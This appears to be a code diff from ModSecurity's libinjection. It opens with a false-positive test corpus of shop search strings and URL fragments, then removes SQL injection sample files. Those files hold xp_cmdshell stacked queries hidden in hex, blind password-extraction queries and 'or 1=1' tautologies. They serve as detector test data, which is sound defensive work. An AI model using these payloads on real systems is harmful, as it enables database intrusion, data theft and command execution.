OUR FIELD BAG IS INTENDED AS A DAILY WORKHORSE, A CROSSOVER BETWEEN A TRADITIONAL ENGLISH FISHING BAG AND AN URBAN MESSENGER BAG. DURABLE CONSTRUCTION AND PRACTICAL FEATURES ALLOW THE BAG TO EXCEL AT CARRYING GEAR BOTH OUTDOORS AND TO THE OFFICE. THE FIELD BAG IS CONSTRUCTED FROM THE HIGHEST QUALITY MATERIALS: 22 OZ WAXED TWILL FABRIC, HORWEEN LEATHER, AND THREAD ARE OF US ORIGIN. WEBBING AND MOST OF OUR BRASS HARDWARE IS SOURCED FROM THE UK. RIRI ZIPPERS ARE MADE IN SWITZERLAND. FEATURES INCLUDE A ROOMY MAIN COMPARTMENT, TWO BELLOWS POCKETS, AND ONE LARGE POCKET ACROSS THE BACK OF THE FIELD BAG. A SOLID BRASS RING PROVIDES AN EASY ATTACHMENT POINT FOR KEYS OR FISHING NET. LEATHER STRAP, ROLLER BUCKLE, AND A HEAVY-DUTY ZIPPER SECURE THE BAG'S CONTENTS. EDGES ARE BOUND IN WAXED COTTON TAPE, ALL STRESS POINTS ARE BAR-TACKED OR RIVETED, AND EACH BAG IS HAND-NUMBERED. EASILY FITS LAPTOPS (UP TO 15") IN THE OWNER'S OWN SLEEVE. DIMENSIONS: 16" X 12.75" X 4"
ALLENTOWN, () PA UNITED STATES
/SEARCH/SUPPLIES?SEARCH_SUBMIT=&Q=STAR COPPER BLANK 1/2"&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
/SEARCH/HANDMADE/ART/PRINT?SEARCH_QUERY=14 X 18"&SEARCH_SUBMIT=&SEARCH_TYPE=CATEGORY&CATEGORY=ART&PAGE=3
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q=WOODEN EMBROIDERY HOOP (3")&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
GREEN...GREEN...GREENISH))) BY JULIA
BRIDAL SHOWER INVITATION RECIPE CARDS'===
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q="<3"&VIEW_TYPE=GALLERY&SHIP_TO=FR
/SEARCH/HANDMADE?Q=8.9" CASE&VIEW_TYPE=GALLERY&SHIP_TO=US
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS_EXACT&SEARCH_QUERY=RED SHOES 9"&PAGE=1&REF=RELATED
7/" ALUMINUM DISC
"MOD" "KITCHEN"
'M M L"\\ INITIALS
I' IS NOT A PLASTIC BAG
;EACH
;ON
IPHONE CASE 4 CASE
LAPTOP CASE 13 AND PHONE
IPAD -4 CASE
EP-2 CASE
ECID=15&
"///
CARD IS 4 AND A HALF X 5 AND A HALF INCHES AND IS AVAILABLE IN A LARGER SIZE AS WELL
2012 WRITE ON CALENDAR
1960 OUTER SPACE METAL LUNCH BOX PAIL TIN DOME TOP 239-S
MACBOOK CASE 13 -IPHONE -IPAD
DUPIONI -UNIQUE -"-UNIQUE -FAT -FQ -RIBBON -TRIM -POLY -POLYESTER
LAPTOP CASE 14&#39;
"UNIQUE" PRINTABLE WEDDING
SILVER BRACELET "FORCE"
MOVIN' ON T-SHIRT
77921690/TURQUOISE-NATURAL-TU
"WRITE" DESIGN
"WHERE'S GEORGE"
"UNIQUE" PRINTABLE WEDDING
"UNION" BY ROBERT F
"TABLE"
"TRUE"
"ON" WHITE GREEN
"CREATE" STERLING GOLD
"CHANGE" NECKLACE
CHAIN MEASURES 18" AND IS COMPOSED COMPLETELY OUT OF BRASS
TAN (WATER RESISTANT INSULATED) MESSENGER
HAND-STITCHED MACBOOK AIR / MACBOOK PRO LEATHER SLEEVE (13") WITH FREE MONOGRAMMING
1/4"-1/2" WIDE RIBBON
1/4"-1" WIDE RIBBON
BILLEEVERSBOUTIQUE , BROWNING "LIKE"
'-"8 TRACK" PLAYER
"AND WHEN THE KIDS ARE OLD ENOUGH"
"AND WHEN THE KIDS ARE OLD
5-ELGIFPIS-0LGAJJZ-NV54YKIS4
"WOOD" AND "SIGN" AND "POLKA DOTS"
TAN
INFINITY LOOP SCARF
INFINITY LOOP
7 DEC 01
CARDS @ TWITTER
1;1;1;CONTROL;0;0;1;
{%25 $NUM_VIEWS|STRING_FORMAT:"%25D" %25} VUES
7 AND A HALF
1060 OR 70S
18 CREATE GOLD
2 LOOP CONNECTORS
7 AND HALF
8 LOOP BOW
8 OR 9 WLV
00 AND 3
10.00 AND UNDER
102 TABLE CLOTH
10 OR LESS
TRUE-CUT
1.25 READ BUTTONS
"ON SALE ON SALE"
(NEW AND UNIQUE)
NEW AND UNIQUE)
1 REAL FEATHER AND 1 PETITE REAL SHELL
(DICKEY DICKIE*)
(1297-MR)
1297-MR),
(BRASS) PEN -BULLET
(CERAMIC OR POTTERY) MUGS
3/4 FEAR AND LOATHING
1 FEAR AND LOATHING
9/16 PLUGS AND TUNNELS
78881214/LARGE-PINK-QUARTZ-DROPS-AND-22K-GOLD
"RETURN ADDRESS LABELS" STICKER
"ON THE WAY"
"ON THE AIR" SIGN
20 SET 3/4
20 SET 3
"CREATE A CRITTER"
"INTO THE WILD"
"ON FIRE FOR" WHITE GREEN
"FOR BETTER OR WORSE"
(ANTIQUE, VINTAGE) QUILT
ANTIQUE, VINTAGE) QUILT
(TRUMPTON, IVOR, CLANGERS, POOH)
TRUMPTON, IVOR, CLANGERS, POOH)
OR-9-9WYTCZT313XRCN2UV62MBE1
IS-8-RJYG1PGMI0GTBH2XDV8AKGZ
(RUSTIC OR ORGANIC) EVERYDAY NECKLACE
RUSTIC OR ORGANIC) EVERYDAY NECKLACE
BLAH <A HREF="/PATH1/PATH2/PATH3">FOO</A>
BLAH <A HREF="FOO.HTML">FOO</A>
BLAH <A HREF="/FOO.HTML">FOO</A>
RSCHMIDT @FPMC-WILLMAR/COM
XSERVING"; ";PLATTER"; ";VINTAGE";
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;''''''''''''''''''''''''''''''''''''''''''''''';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKL;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;';;LK
SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) --
SWIRLS DIGITAL SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) -- 10 DIGITAL PAPERS -- 122
HTTP://WWW.MECKMOM.COM/MMDL/CHRISTMAS BUDGET PLANNER.PDF';" HREF="HTTP:/WWW.MECKMOM.COM
1.5 WITH 1/2 INCH LOOP END LOBSTER
60;S MOD DRESSES
7" #2 CIRCULAR NEEDLE
9/PLUGS AND TUNNELS
9/16PLUGS AND TUNNELS
"NOT ON FACEBOOK"
"#2 MOM"
80%25 ACRYLIC AND 20%25 WOOL
35%25 COTTON AND 65%25 POLYESTER.
5685587||ORDER=||SECTION_ID=||PAGE=2
{%25 $SENDER_FULL_NAME %25} BLAH BLAH BLAH {%25 $CONVO_SEND_DATE|DATE_FORMAT:'%25B %25D, %25Y' %25}.
UJUUUI8UJKPKJMMJUMNMJUJMMNNJUJMNJJJMNJKJMJJKBJ9I8UJJMMNJNJJJJJJNNKJNMKUJJUNKJJJNJNJKJJJJJJJJJMNJJJJJKJIJJJJJJJJJJJJJJJJJGGGFSAQWERTYUIOP[]';LKGFDSAZXBNM,.
BAMBOO CHARCOAL SOAP 1 '#
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' -SHOES -SANDLES -HEEL --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
<SPAN CLASS="SHOW-TEXT">REGARDEZ</SPAN>
BOOKMAR';[K]]
WOOL AND ACRYLIC FOR SOFTNESS
01/DEC/2011:20:45:25
0;1;0;1;0
5-DEC-QRIBMKCDNBUO2ELCW2FGFI
WOMEN';S ART DEC
DO OR NOT DO, THERE IS NO
ABC AND 123 WALL DEC
1.5 WITH 1/2 INCH LOOP END
"NOT FOR SALE"
"IS" STAMP
"LIKE" STAMP
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
1950' AND 60'S WOMEN'S COATS WITH FAKE
FOO; BAR 1+2+3
WO;DCAT[JPTPGRA][
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK PRO DECALS 15"&PAGE=2
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK+PRO+DECALS+15&PAGE=2
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%26PAGE%3D2
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%22%26PAGE%3D2
KNICKIN' AND KNACKIN' SEE WHAT ONFIRE'S PACKIN' FOR CHRISTMAS BY ANNIE BECWAR
0=[]'
"AS FOR ME AND MY
"EXIT, PURSUED B
"EXIT, PURSUED BY
4%27%2BX%2B4%27%2BWOOD
48%22%2BX%2B48%22%2BMODERN%2BART
90-%2B6%2BINCH
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D20%22%2BX%2B20%22%2BPILLOW%2BCOVER%2BGREEN%2BPATTERN%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22NOT%2BAMUSED%22%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DZZ%26VIEW_TYPE%3DGALLERY%26PAGE%3D4
%2FSEARCH%2FHANDMADE%2FPLANTS_AND_EDIBLES%3FSEARCH_SUBMIT%3D%26Q%3D%22SET%2BOF%2B6%22%26MAX%3D18%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DUS%26VIEW_TYPE%3DGALLERY
%2FSEARCH%2FVINTAGE%3FSEARCH_SUBMIT%3D%26Q%3D%22TABLE%2BLAMP%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D10
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DSHABBY%2B%22AND%2BWHITE%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D6
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DSILVER%2BCHAIN%2B20%22%26FILTER%5B0%5D%3DSUPPLIES
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%5B0%5D%3DVINTAGE
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%3DVINTAGE
%2FSEARCH%2FHANDMADE%3FQ%3DYELLOW%2BPHOTOGRAPHY%2BBACKDROP%2B%2B-3%27%2B-4%27%2B-DIGITAL%2B-MINI%26VIEW_TYPE%3DGALLERY
HTTP%3A%2F%2FDEEDEECAMPBELL.BLOGSPOT.COM%2F2011%2F12%2FHAPPY-SNOWMAN-TAG.HTML%3FUTM_SOURCE%3DFEEDBURNER%26UTM_MEDIUM%3DFEED%26UTM_CAMPAIGN%3DFEED%3A%2BSCRAPPINWITHDEEDEE%2B%28SCRAPPIN%27%2BWITH%2BDEEDEE%29
RECLAIMED%20WOOD%22%20%2B%20%22SIGN%22%20%2B%20%22PRIMITIVE%22
%22MOD%22%20%22
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22MOD%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D14
/SEARCH%3FSEARCH_SUBMIT%3D%26Q%3D36%22%2BX%2B48%2B%22%2BFRAME%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
DO%20OR%20NOT%20DO
DO%20OR%20NOT%20DO%2C
9%216%2BEARINGS
%22NOT+GAY+AS+I
%22+-+%22MAGAZINE%22
FAITES+UN+TOUR+SUR+NOTRE+NOUVELLE+%3CBR+%2F%3E%3CA+HREF%3D%22%2FAPPS%2F%22%3EGALERIE+D%27APPLICATIONS%3C%2FA%3E%21
RENCONTREZ+DES+PERSONNES+AVEC+QUI+VOUS+AVEZ+DES+INTRTS+COMMUNS+ET+COLLABOREZ+AVEC+EUX.+TROUVEZ+DES+TEAMS+LOCAUX++REJOINDRE+SUR+LA+%3CA+HREF%3D%22%2FTEAMS%2F%22%3EPAGE+DES+TEAMS%3C%2FA%3E
FHFUIVJGUJOKKIIKIIOJKK%5BI%5B%27%3D%5C%5D%3D-%5DL%3B/...
%27-%228
%27-%228%20TRACK%22
%27-%228%20TRACK%20PL
2%20got%20%40AOL.COM
L%3BIN%20TABLE%20RUNNER
OW%3BCAST%20IRON%20TRIVETS
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26REF%3DAUTO%26Q%3DPICTURES%2BFRENCH%2B11%22%2B-%2B14%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
SET%208%20-MINI%20AS
1/4%22-1/2RIBBON
1/4%22-1/RIBBON
PHILLIPKEEGAN-777-%40HOTMAIL.COM
AUG%2B15%2BKEYS
%22foo%22+AND+%22bar%22+AND
%22foo%22+AND+%22bar%22
%22WILD+OLIVE%22+%2B+%22YELLOW+CHERRIES%22
%22WHITE%22+%2B+%22PLATE%22+%2B+%22POTTERY%22
FOO+BAR%27%23+BLAH
5%2F8%2BLOOP
CONNECTORS+%2B+2-PRONG
50%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
50PCS%2BANTIQUE%2BBRONZE%2BFINISH%2BCONNECTORS%2B8MM%2B%280633%29
32%2BKRAFT%2BBROWN%2B%22HANDMADE%22%2BSTICKER
25%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
%281156-MG%29%2BNEW%2BMATTE%2BGOLD%2BPLATED%2BTEXTURED%2BLINKED%2B3-RING%2BPENDANTS
%22CROSS+STITCH%22+%2B+%22TREE+SKIRT
%2FSEARCH%3FQ%3D15%22%2BLAPTOP%2BCASE%26PAGE%3D6
%2BIPHONE%2B4%2BCASE
%22TERRACE%22++-++1932++-++WM.+ROGERS+MFG.+CO.
%22ATEAM%22+AND+AND+%22GIFT+CERTIFICATE%22
%22CLIP+ON%22+-EARRING%2A+-SWEATER+-SHOE%2A+-TIE%2A+-EPHEMERA+-CUFFLINK%2A+-HAIR+-BARRETTE%2A+-DRESS%2A+-BROOCH%2A+-PIN%2A+-MONEY+-PRINT
4%2FABKDFAY1YORLFIM6NZYU8DTZP1-1
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DPIN%2B%22AS%2BIS%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22AND%2BWHEN%2BTHE%2BKIDS%2BARE%2BOLD%2BENOUGH%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
THING%2B1%2BAND%2BTHING%2B2
1Q9D819XMTILZVG1BOBY27-4-ROW
NOT+AS+SAD+AS+I+USED+TO+BE
NOT+AS+SAD+AS+I
IPHONE%2B4%2BCASE%2BRUSSIAN
COPPER%2B20%2BROUND
CASE+FOR+KINDLE+WITH+KEYBOARD
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22LIKE%22%2BSTAMP%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
MISTERGLAS.DK%27%2A%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27
BIRTHDAY%2B12%2BMONTH%2B
6R2OS3JNSM-48-IN-0ZENVYLUJJL
14+1%2F2%22+-+USUALLY+FOR+3+MONTHS+TO+6+MONTHS
XVPG_TLIHBUY60_ZHXPSA-4-PI-P
GALLERY%3D1%3D5
I+%3C3+%3C3
I+%3C3+%3C3+THE+DOCTOR
SIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS%2BSTARTER%2BKIT
4%7C28940%7C10142125%7C6003940396642%7C6003940506642%7C%7C%7CTC%7C%7CC%7C%7C%7C
-3-B39RBBO58YMVIHEVAUZBS-6TF
.75+%22+X+1.5%22
"SIGNAL LOCK"
3 TABLE LAMP WITH FLOWERS
9483773&REFERRING_LISTING_ID=62611583&REF=LS_CONTACT_BOTTOM
1950 UNION MADE
EWELRY; __UTMC=111461200; __UTMB=111461200.37.10.13431224
1 AND A1/2 INCH LIME GREEN GROSGRAIN RIBBON
3271888&SR=1-1-SPELL&KEYWORDS=LEGAND+POSTER
SHELL IS 65 AND 35 POLY COTTON BLEND
Y; __UTMC=111461200; __UTMB=111461200.29.10.1342974283
5EOR-5MDKFIKK50HAHCPYPUVLG-2
LISTING-PRICE"> P="L TING-PRICE"> <A-TRIGVORITE LISTING-FAVORITE INNNNN SHABBY CHIC CREAM CURTAINS VINTAGE CURTAI RIG <IMG SRC=
5683190/TARGET="_BLANK"
3 TRAILING AIRPLANES WITH YOUR NAME DECAL
SUKAN / SET (2 PIECE) HAND WOVEN ORIGINAL SILK
# some base64 things?
zzh7W_krs4jSNwVV2TssQsSbOj--
1611-IioXXIG1ti8rspL2vbXFy--
1611/IioXXIG1ti8rspL2vbXFy--
Mosaic "Table top"
# Used in HTTP headers, e.g. Accept: */*
*/*
"Dr. Who" and coffee
"rose gold" necklace 14
"flagging" -american -festive --peace -prayer -america -stripes -straws
shabby "and white
"3 1'/3
"*"
necklace length 16" or 18"
4 pcs- (5003-BK) 14mm Black
"Keys"
"dec"
'countdown calendar" and "disney:
1950 or 1960
black and "shower curtain"
dad and keychain and "loved by"
if all else fails call grandma
case 13"
12.5 x 12.5&quot;
O'connors UNION selected a few friendsf from a
O'connors UNION selected a few friendsf from
O'connors UNION selected a few friendsf fr
O' UNION selected a few friends
O'connors UNION selected a few friends
1 I like having true friends
I like having true friends
I having true friends
I was having true friends
1 having
"1--"
'1--'
"1--
'1--
1 collate these union documents
17+inch+PC+LAPTOP+Sleeve%2FBag%2FCase+with+zipper+pocket+and+adjustable+strap
# from https://github.com/client9/libinjection/issues/49
1,(1)
Toronto, ON, Canada - (YYZ)
1,1--
(1)-x
1 function (1)
'/1x-
# technically x OR 1
#x|x||1
select 'and'
x/void(1)
select x from y where
x/*
1x(((
1),(1
x, @x, @x
#
1; exec will create the case 7
`
1234`
junk <a href="../">foo.com</a>
# bogus
1alert(1)
foo 'null' bar
User(foo),junk
User(login_name),Images(url_170x135)
mr and mrs table sign
USPS 1-3 Day (USPS doesn't guarantee 3 day arrival)
foo or bar add 1
Apt is gated; call when you get here, and we'll come down to get it.
DaVi - Open and Close Your Blinds With Your Phone!
Foo and 80&#039;s Foo / Bar
Work Time (Rosewood, Lavender, Bergamot, Grapefruit) Recommended
Same as reward #1 however
foobar sent you 1 message about
4.7" & iPhone 6 Plus 5.5
Family and friends having meal outdoors
<table width="99%" border="0" cellpadding="1"'
8-bit Limit (BRK)
3rd space(s)
Ink and White Out 2 in 1 Pen
Reality check (2016)
Please select pair #1

30
src/deps/src/ModSecurity/others/libinjection/data/sqli-@ru_raz0-20160705.txt
View File

@ -1,30 +0,0 @@
# https://twitter.com/ru_raz0r/status/750311113435283456
#
username'exec master..xp_cmdshell'ping 127.0.0.1' -- and password = 'test'
username'declare @s varchar (8000); ...
username'DECLARE @find varchar(30) = 'Man%'
'begin declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end
'goto label; label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'begin try select 1/0 end try begin catch declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end catch--
'begin try declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end try begin catch print 1 end catch--
'begin goto label declare @a varchar label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end
'begin goto label ALTER DATABASE pubs SET RECOVERY SIMPLE label: declare @s varchar (8000) set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'begin goto label select 1 label: @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'begin goto label label: declare @s varchar (8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s); end--
'goto label label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label ALTER DATABASE pubs SET RECOVERY SIMPLE; label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label INSERT INTO Production.UnitMeasure (Name, UnitMeasureCode,ModifiedDate) VALUES (N'Square Yards', N'Y2', GETDATE()) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label declare @a label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select cast(@@version as varchar) label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select @@version label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select "a" label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'goto label select 1 label: declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'select @@version; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 'a'; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 1; declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select @@version begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 'a' begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select 1 begin declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s) end--
'select @@version goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'select 'a' goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x65786563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--
'select 1 goto label select 'a' label:declare @s varchar(8000);set @s = cast(0x6576563206D61737465722E2E78705F636D647368656C6C202770696E67203137322E31362E392E3627 as varchar(max));exec(@s)--

11
src/deps/src/ModSecurity/others/libinjection/data/sqli-arithmetic_blind_sqli.txt
View File

@ -1,11 +0,0 @@
# Not sure of original source
# attributed to David Litchfield
#
234+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29
foo%27+%2B+%281+%2F+ASCII%28substring%28passwd%2C1%2C1%29%29-4%29--
456+%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10
foo%27%2B+ASCII%28substring%28passwd%2C1%2C1%29%29-10--
# overflow
123%2B+%28%280+%2F+ascii%28substring%28passwd%2C1%2C1%29%29+%2A+4294967296%29

73
src/deps/src/ModSecurity/others/libinjection/data/sqli-arithmetic_variations.txt
View File

@ -1,73 +0,0 @@
# samples
# unlikely to execute correctly
# probably just generated automatically without regard for usefulness
# but seen in wild "FIELD AND NUM=NUM"
# FAILS
#"1*HOPE AND 8=3",
#"0+HOPE AND 8=3",
#"0+(HOPE) AND 8=3",
HOPE%2A1+AND+8%3D3
## HOPE%2A%281%29+AND+8%3D3
# RHS variations
HOPE+AND+8%3D3
HOPE+AND+-8%3D3
HOPE+AND+-8%3D-3
HOPE+AND+%28-8%29%3D%28-3%29
HOPE+AND+%288%29%3D3
HOPE+AND+8%3D%283%29
HOPE+AND+%288%29%3D%283%29
HOPE+AND+1%2B2%3D3%2B4
HOPE+AND+COS%283%29%3DSIN%284%29
# lhs work arounds
HOPE%2A1+AND+8%3D3
## HOPE%2A%281%29+AND+8%3D3
%28HOPE%29+AND+8%3D3
%28HOPE%29%2A1+AND+8%3D3
%28HOPE%29%2B0+AND+8%3D3
1%2A%28HOPE%29+AND+8%3D3
%281%29%2A%28HOPE%29+AND+8%3D3
%281%29%2AHOPE+AND+8%3D3
%28%281%29%29%2AHOPE+AND+8%3D3
%28%281%29%29%2A%28HOPE%29+AND+8%3D3
%28%281%29%29%2A%28%28HOPE%29%29+AND+8%3D3
%28%28%281%29%29%29%2AHOPE+AND+8%3D3
%28%28%28%281%29%29%29%29%2AHOPE+AND+8%3D3
# based on NUM AND 1=1--
PI%28%29+AND+COS%28PI%28%29%29%3D-1
PI%28%29+%26%26+COS%28PI%28%29%29%3D-1
FLOOR%28PI%28%29%29+AND+SIN%28PI%28%29%29%3D0
-9-%282%29+OR+1+%3D+1
8-9+OR+1+%3D+1
-9-%282%29+OR+1+%3D+1
-9-%28%282%29%29+OR+1+%3D+1
-9-%28%28%282%29%29%29+OR+1+%3D+1
%7E9-%282%29+OR+1+%3D+%7E1
a%27%2712%27+and+%28pi%28%29%3Dpi%28%29%29--
a%27%2712%27+and+pi%28%29%3Dpi%28%29--
dingberry%27%271%27+and+%28false%29--
dingberry%27%271%27+and+%28pi%28%29%3D3%29--
dingberry%27%271%27+and+%283%3Dpi%28%29%29--
1%27%2712%27+and+%283%3Dpi%28%29%29--
1%27%2B%2712%27+and+%283%3Dpi%28%29%29--
1%27%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
1%27%2B%28%28%2712%27%29%29+and+%283%3Dpi%28%29%29--
1%27%2B%28%28%28%2712%27%29%29%29+and+%283%3Dpi%28%29%29--
1%2B%28%2712%27%29+and+%283%3Dpi%28%29%29--
1%2Bpi%28%29+and+%283%3Dpi%28%29%29--
1%2B%28pi%28%29%29+and+%283%3Dpi%28%29%29--
1%2B%28%28pi%28%29%29%29+and+%283%3Dpi%28%29%29--
1%2B%28%28%28pi%28%29%29%29%29+and+%283%3Dpi%28%29%29--
1%27%2Bpi%28%29+and+%283%3Dpi%28%29%29--
1234%27%27z%27+and+%283%3Dpi%28%29%29--
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D21--
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%2821%29--
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D21--
foo%27+and+1%2B2%2B3%2B4%2B5%2B6%3D%287%2A3%29--
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D%287%2A3%29--
foo%27+and+%281%2B2%2B3%2B4%2B5%2B6%29%3D7%2A3--
foo%27+and+%281%2B2%2B3%2B%284%2B5%2B6%29%29%3D7%2A3--

15
src/deps/src/ModSecurity/others/libinjection/data/sqli-arneswinnen.net-boolean.txt
View File

@ -1,15 +0,0 @@
#
# from http://www.arneswinnen.net/2013/09/automated-sql-injection-detection/
#
999999 or 1=1 or 1=1
' or 1=1 or '1'='1
" or 1=1 or "1"="1
999999) or 1=1 or (1=1
') or 1=1 or ('1'='1
") or 1=1 or ("1"="1
999999)) or 1=1 or ((1=1
')) or 1=1 or (('1'='1
")) or 1=1 or (("1"="1
999999))) or 1=1 or (((1
